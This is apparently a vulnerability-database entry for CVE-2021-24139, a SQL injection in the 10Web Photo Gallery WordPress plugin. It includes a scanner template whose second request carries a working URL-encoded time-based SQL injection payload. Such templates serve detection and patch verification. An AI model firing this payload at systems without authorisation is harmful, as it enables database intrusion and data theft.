/Vulnerability Library

10Web Photo Gallery < 1.5.55 - SQL Injection

CVE-2021-24139
Verified

Description

WordPress plugin 10Web Photo Gallery versions before 1.5.55 contains a SQL injection caused by unvalidated input in the 'bwg_search_x' parameter in frontend/models/model.php, letting attackers execute arbitrary SQL commands, exploit requires attacker to control the 'bwg_search_x' parameter.

Severity

Critical

CVSS Score

9.8

Exploit Probability

48%

Affected Product

photo_gallery

Published Date

January 29, 2026

Template Author

riteshs4hu

CVE-2021-24139.yaml
id: CVE-2021-24139

info:
  name: 10Web Photo Gallery < 1.5.55 - SQL Injection
  author: riteshs4hu
  severity: critical
  description: |
    WordPress plugin 10Web Photo Gallery versions before 1.5.55 contains a SQL injection caused by unvalidated input in the 'bwg_search_x' parameter in frontend/models/model.php, letting attackers execute arbitrary SQL commands, exploit requires attacker to control the 'bwg_search_x' parameter.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data theft, data tampering, or full database compromise.
  remediation: |
    Update to version 1.5.55 or later.
  reference:
    - https://wpscan.com/vulnerability/2e33088e-7b93-44af-aa6a-e5d924f86e28
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/photo-gallery/photo-gallery-by-10web-1554-sql-injection-via-bwg-search-x-parameter
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24139
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-24139
    cwe-id: CWE-89
    epss-score: 0.48385
    epss-percentile: 0.97785
    cpe: cpe:2.3:a:10web:photo_gallery:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: 10web
    product: photo_gallery
    publicwww-query: "bwg_container"
  tags: cve,cve2021,wp,wp-plugin,sqli,photo-gallery,10web,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /index.php?rest_route=/wp/v2/pages HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: slug
        group: 1
        regex:
          - '"slug"\s*:\s*"([^"]+)"[\s\S]*?"content"\s*:\s*{\s*"rendered"\s*:\s*".*?bwg'
        internal: true

  - raw:
      - |
        @timeout: 50s
        GET /{{slug}}/?bwg_search_0=%22%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F4846%2F%2A%2A%2FFROM%2F%2A%2A%2F%28SELECT%28SLEEP%285%29%29%29UIHp%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28%22zQgg%22%2F%2A%2A%2FLIKE%2F%2A%2A%2F%22zQgg HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=5'
          - 'status_code==200'
# digest: 4b0a004830460221009a66a05c71a3f50768c168764555a379b6fe1c5c319b8cffbf8fcccfae57479f022100846311df7a0067fd6c7bf52dda641df0358163e00ab4202b387500d7ddf70961:922c64590222798bb761d5b6d8e72950
9.8Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2021-24139
CWE ID:
cwe-89

References

https://wpscan.com/vulnerability/2e33088e-7b93-44af-aa6a-e5d924f86e28https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/photo-gallery/photo-gallery-by-10web-1554-sql-injection-via-bwg-search-x-parameterhttps://nvd.nist.gov/vuln/detail/CVE-2021-24139

Remediation Steps

Update to version 1.5.55 or later.